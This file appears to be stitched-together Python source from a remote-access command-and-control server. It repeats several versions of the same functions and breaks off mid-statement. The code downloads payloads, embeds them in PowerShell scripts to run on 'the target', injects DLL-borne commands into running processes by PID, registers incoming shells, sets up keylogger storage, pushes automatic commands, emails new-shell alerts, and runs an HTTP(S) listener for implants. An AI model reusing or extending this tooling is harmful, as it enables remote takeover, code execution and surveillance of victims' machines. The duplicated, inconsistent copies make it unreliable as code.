def exec_code(self, data):
try:
cmd, path = data.split(" ", 1)
except:
UI.error("Missing arguments")
return ""
data = ";"
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ";":
UI.success("Fetching %s" % path)
data = base64.b64encode(data)
ps = Utils.load_powershell_script("exec.ps1", 12)
ps = Utils.update_key(ps, "PAYLOAD", data)
UI.success("Payload should be executed shortly on the target")
return ps
else:
UI.error("Cannot fetch the resource")
return data
def start_httpd(config):
ip = config.get('http-host')
try:
port = int(config.get('http-port'))
except:
UI.error("(http-port) HTTP port need to be a integer.", True)
print '\r\n'
UI.success('Starting web server on %s port %d' % (ip, port))
try:
server_class = BaseHTTPServer.HTTPServer
factory = HTTPDFactory(config)
httpd_server = server_class((ip, port), factory)
if config.get('https-enabled') == 'on':
cert = config.get('https-cert-path')
Utils.file_exists(cert, True)
httpd_server.socket = ssl.wrap_socket(httpd_server.socket,
certfile=cert)
UI.success('Web server is using HTTPS')
httpd_server.serve_forever()
except:
UI.error(
'Server was not able to start (Port already in use?)... Aborting',
True)
def inject(self, data):
archs = ["32", "64"]
try:
option, arch, pid, cmd = data.split(" ", 3)
except:
UI.error("Missing arguments")
return ""
if len(cmd) > 4096:
UI.error("Your command is bigger than 4096 bytes")
return ""
if not arch in archs:
UI.error("Invalid architecture provided (32/64)")
return ""
dll = Utils.load_file("bin/inject-%s.dll" % arch)
dll = dll.replace("A" * 4096, cmd + "\x00" * (4096 - len(cmd)))
ps = Utils.load_powershell_script("injector.ps1", 1)
ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(dll))
ps = Utils.update_key(ps, "PID", pid)
UI.success("Injecting %s" % cmd)
UI.success("Into %s bits process with PID %s" % (arch, pid))
return ps
def upload_file(self, data):
try:
cmd, path, remote = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
data = ";"
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ";":
UI.success("Fetching %s" % path)
data = base64.b64encode(data)
ps = Utils.load_powershell_script("upload.ps1", 3)
ps = Utils.update_key(ps, "PAYLOAD", data)
ps = Utils.update_key(ps, "PATH", remote)
UI.success("Payload will be saved at %s" % path)
return ps
else:
UI.error("Cannot fetch the resource")
return data
def upload_file(self, data):
try:
cmd, path, remote = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
data = ";"
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ";":
UI.success("Fetching %s" % path)
data = base64.b64encode(data)
ps = Utils.load_powershell_script("upload.ps1", 3)
ps = Utils.update_key(ps, "PAYLOAD", data)
ps = Utils.update_key(ps, "PATH", remote)
UI.success("Payload will be saved at %s" % path)
return ps
else:
UI.error("Cannot fetch the resource")
return data
def exec_code(self, data):
try:
cmd, path = data.split(" ", 1)
except:
UI.error("Missing arguments")
return ""
data = ";"
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ";":
UI.success("Fetching %s" % path)
data = base64.b64encode(data)
ps = Utils.load_powershell_script("exec.ps1", 16)
ps = Utils.update_key(ps, "PAYLOAD", data)
UI.success("Payload should be executed shortly on the target")
return ps
else:
UI.error("Cannot fetch the resource")
return data
def register(self, guid, data):
cmd, guid, prompt = data.split(" ", 2)
self.db.set_prompt(guid, prompt)
index = self.db.get_id(guid)
print ""
UI.success("Registering new shell %s" % prompt)
UI.success("New shell ID %s GUID is %s" % (index, guid))
Log.log_event("New Shell", data)
def register(self, guid, data):
cmd, guid, prompt = data.split(" ", 2)
self.db.set_prompt(guid, prompt)
index = self.db.get_id(guid)
print ""
UI.success("Registering new shell %s" % prompt)
UI.success("New shell ID %s GUID is %s" % (index, guid))
Log.log_event("New Shell", data)
def get_autocommands(self, guid):
profile = self.config.get("profile")
commands = profile.get("autocommands")
if isinstance(commands, list):
UI.success("Running auto commands on shell %s" % guid)
for command in commands:
print "[+] %s" % command
self.db.push_cmd(guid, command, Utils.guid(), self.config.get("username"))
def set_alias(self, data):
try:
(cmd, key, value) = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
self.alias.set_custom(key, value)
UI.success("%s is now set to %s" % (key, value))
return ""
def set_alias(self, data):
try:
(cmd, key, value) = data.split(' ', 2)
except:
UI.error('Missing arguments')
return ''
self.alias.set_custom(key, value)
UI.success('%s is now set to %s' % (key, value))
return ''
def get_cmd_send(self):
guid = False
for item in self.sql.get_cmd(self.config.get("uid")):
print ""
UI.success("[%s] Sending command: %s" %
(item[4], self.sql.get_cmd_data(item[1])))
self.sql.delete_cmd(item[0], item[2], item[1], item[3])
guid = item[0]
return guid
def get_cmd_send(self):
guid = False
for item in self.sql.get_cmd(self.config.get('uid')):
print ''
data = self.sql.get_cmd_data(item[1])
UI.success('%s - Sending command: %s' % (item[4], data))
self.sql.delete_cmd(item[0], item[2], item[1], item[3])
guid = item[0]
if data == 'exit':
guid = 'exit'
return guid
def set_alias(self, data):
try:
cmd, key, value = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
self.alias.set_custom(key, value)
UI.success("%s is now set to %s" % (key, value))
return ""
def register(self, guid, data):
cmd, guid, prompt = data.split(" ", 2)
self.db.set_prompt(guid, prompt)
index = self.db.get_id(guid)
print ""
UI.success("Registering new shell %s" % prompt)
UI.success("New shell ID %s GUID is %s" % (index, guid))
Log.log_event("New Shell", data)
self.get_autocommands(guid)
if self.config.get("auto-interact") == "on":
pass
def get_autocommands(self, guid):
profile = self.config.get("profile")
commands = profile.get("autocommands")
if isinstance(commands, list):
shell = self.db.get_prompt(guid).decode().split(" ")[1]
UI.success("Running auto commands on shell %s" % shell)
Log.log_event("Running auto commands on shell", shell)
for command in commands:
print("\t[+] %s" % command)
Log.log_shell(guid, "Sending", command)
self.db.append_shell_data(guid, "[%s] AutoCommand Sending: \n%s\n\n" % (Utils.timestamp(),command))
self.db.push_cmd(guid, command, Utils.guid(), self.config.get("username"))
def inject(self, data):
try:
(option, pid, cmd) = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
ps = Utils.load_powershell_script("injector.ps1", 1)
ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd))
ps = Utils.update_key(ps, "PID", pid)
UI.success("Injecting %s" % cmd)
UI.success("Into process with PID %s" % pid)
return ps
def register(self, guid, data):
(cmd, guid, prompt) = data.split(' ', 2)
self.db.set_prompt(guid, prompt)
index = self.db.get_id(guid)
print ''
UI.success('Registering new shell %s' % prompt)
UI.success('New shell ID %s GUID is %s' % (index, guid))
self.db.set_key("%s:keylogger" % guid, "")
Log.log_event('New Shell', data)
self.get_autocommands(guid)
if self.config.get('auto-interact') == 'on':
pass
def inject(self, data):
try:
(option, pid, cmd) = data.split(' ', 2)
except:
UI.error('Missing arguments')
return ''
ps = Utils.load_powershell_script('injector.ps1', 1)
ps = Utils.update_key(ps, 'PAYLOAD', base64.b64encode(cmd))
ps = Utils.update_key(ps, 'PID', pid)
UI.success('Injecting %s' % cmd)
UI.success('Into process with PID %s' % pid)
return ps
def inject(self, data):
try:
option, pid, cmd = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
ps = Utils.load_powershell_script("injector.ps1", 1)
ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd))
ps = Utils.update_key(ps, "PID", pid)
UI.success("Injecting %s" % cmd)
UI.success("Into process with PID %s" % pid)
return ps
def register(self, guid, data):
if type(data) is not str:
data = data.decode()
(cmd, guid, prompt) = data.split(" ", 2)
self.db.set_prompt(guid, prompt)
index = self.db.get_id(guid).decode()
print("")
UI.success("Registering new shell %s" % prompt)
UI.success("New shell ID %s GUID is %s" % (index, guid))
self.db.set_key("%s:keylogger" % guid, "")
Log.log_event("New Shell", data)
self.get_autocommands(guid)
if self.config.get("auto-interact") == "on":
pass
def get_autocommands(self, guid):
profile = self.config.get('profile')
commands = profile.get('autocommands')
if isinstance(commands, list):
UI.success('Running auto commands on shell %s' % guid)
Log.log_event('Running auto commands on shell', guid)
for command in commands:
print '\t[+] %s' % command
Log.log_shell(guid, 'Sending', command)
self.db.append_shell_data(
guid, "[%s] AutoCommand Sending: \n%s\n" %
(Utils.timestamp(), command))
self.db.push_cmd(guid, command, Utils.guid(),
self.config.get('username'))
def start_httpd(config):
ip = config.get("http-host")
port = int(config.get("http-port"))
UI.success("Starting web server on %s port %d" % (ip, port))
server_class = BaseHTTPServer.HTTPServer
factory = HTTPDFactory(config)
httpd_server = server_class((ip, port), factory)
if config.get("https-enabled") == "on":
cert = config.get("https-cert-path")
Utils.file_exists(cert, True)
httpd_server.socket = ssl.wrap_socket(httpd_server.socket, certfile=cert)
UI.success("Web server is using HTTPS")
httpd_server.serve_forever()
def start_httpd(config):
ip = config.get("http-host")
port = int(config.get("http-port"))
UI.success("Starting web server on %s port %d" % (ip, port))
server_class = BaseHTTPServer.HTTPServer
factory = HTTPDFactory(config)
httpd_server = server_class((ip, port), factory)
if config.get("https-enabled") == "on":
cert = config.get("https-cert-path")
Utils.file_exists(cert, True)
httpd_server.socket = ssl.wrap_socket(httpd_server.socket, certfile=cert)
UI.success("Web server is using HTTPS")
httpd_server.serve_forever()
def fetch(self, data):
try:
(cmd, path, ps) = data.split(' ', 2)
except:
UI.error('Missing arguments')
return ''
data = ';'
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ';':
UI.success('Fetching %s' % path)
UI.success('Executing %s' % ps)
return '%s;%s' % (data, ps)
else:
UI.error('Cannot fetch the resource')
return ''
def fetch(self, data):
try:
(cmd, path, ps) = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
data = ";"
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ";":
UI.success("Fetching %s" % path)
UI.success("Executing %s" % ps)
return "%s;%s" % (data, ps)
else:
UI.error("Cannot fetch the resource")
return ""
def register(self, guid, data):
if type(data) is not str:
data = data.decode()
(cmd, guid, prompt) = data.split(" ", 2)
self.db.set_prompt(guid, prompt)
index = self.db.get_id(guid).decode()
print("")
UI.success("Registering new shell %s" % prompt)
UI.success("New shell ID %s GUID is %s" % (index, guid))
try:
notify = EmailNotify(config)
notify.send_notification("NEW SHELL callback: %s" % prompt)
except:
UI.error("Notification failed", False)
self.db.set_key("%s:keylogger" % guid, "")
Log.log_event("New Shell", data)
self.get_autocommands(guid)
if self.config.get("auto-interact") == "on":
pass
def fetch(self, data):
try:
cmd, path, ps = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
data = ";"
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ";":
UI.success("Fetching %s" % path)
UI.success("Executing %s" % ps)
return "%s;%s" % (data, ps)
else:
UI.error("Cannot fetch the resource")
return ""
def exec_code(self, data):
try:
(cmd, path) = data.split(' ', 1)
except:
UI.error('Missing arguments')
return ''
data = ';'
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ';':
UI.success('Fetching %s' % path)
data = base64.b64encode(data)
ps = Utils.load_powershell_script('exec.ps1', 16)
ps = Utils.update_key(ps, 'PAYLOAD', data)
UI.success('Payload should be executed shortly on the target')
return ps
else:
UI.error('Cannot fetch the resource')
return data
def start_httpd(config):
ip = config.get("http-host")
try:
port = int(config.get("http-port"))
except:
UI.error("(http-port) HTTP port need to be a integer.", True)
UI.warn("Starting web server on %s port %d" % (ip, port))
try:
server_class = http.server.HTTPServer
factory = HTTPDFactory(config)
httpd_server = server_class((ip, port), factory)
if config.get("https-enabled") == "on":
cert = config.get("https-cert-path")
Utils.file_exists(cert, True)
httpd_server.socket = ssl.wrap_socket(httpd_server.socket, certfile=cert)
UI.success("Web server is using HTTPS")
httpd_server.serve_forever()
except Exception as e:
print("%s, %s" % (sys.exc_info()[1],sys.exc_info()[2]))
UI.error("Server was not able to start (Port already in use?)... Aborting", True)
def start_httpd(config):
ip = config.get("http-host")
port = int(config.get("http-port"))
print "\r\n"
UI.success("Starting web server on %s port %d" % (ip, port))
try:
server_class = BaseHTTPServer.HTTPServer
factory = HTTPDFactory(config)
httpd_server = server_class((ip, port), factory)
if config.get("https-enabled") == "on":
cert = config.get("https-cert-path")
Utils.file_exists(cert, True)
httpd_server.socket = ssl.wrap_socket(httpd_server.socket,
certfile=cert)
UI.success("Web server is using HTTPS")
httpd_server.serve_forever()
except:
UI.error(
"Server was not able to start (Port already in use?)... Aborting",
True)
def upload_file(self, data):
try:
(cmd, path, remote) = data.split(' ', 2)
except:
UI.error('Missing arguments')
return ''
data = ';'
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ';':
UI.success('Fetching %s' % path)
data = base64.b64encode(data)
ps = Utils.load_powershell_script('upload.ps1', 3)
ps = Utils.update_key(ps, 'PAYLOAD', data)
ps = Utils.update_key(ps, 'PATH', remote)
UI.success('Payload will be saved at %s' % path)
return ps
else:
UI.error('Cannot fetch the resource')
return data
profile = CONFIG(profile)
config.set("profile", profile)
uid = Utils.guid()
config.set("uid", uid)
config.set("username", "(CLI)%s" % sys.argv[2])
db = RedisQuery(config)
sql = MySQLQuery(config)
sql.install_db().init_uid()
config.set("redis", db)
config.set("mysql", sql)
db.update_config(config).init_sql()
UI.success("Current Active session UUID is %s" % config.get("uid"))
# Launch the HTTPD daemon
if not "-nohttpd" in sys.argv:
httpd_thread = init_httpd_thread(config)
cli = Cli(config)
while True:
try:
cmd = cli.prompt()
cli.parse_cmd(cmd)
except KeyboardInterrupt as e:
UI.error("*** You really want to exit the application? *** (yes/no)")
if UI.prompt("Exit").lower() == "yes":
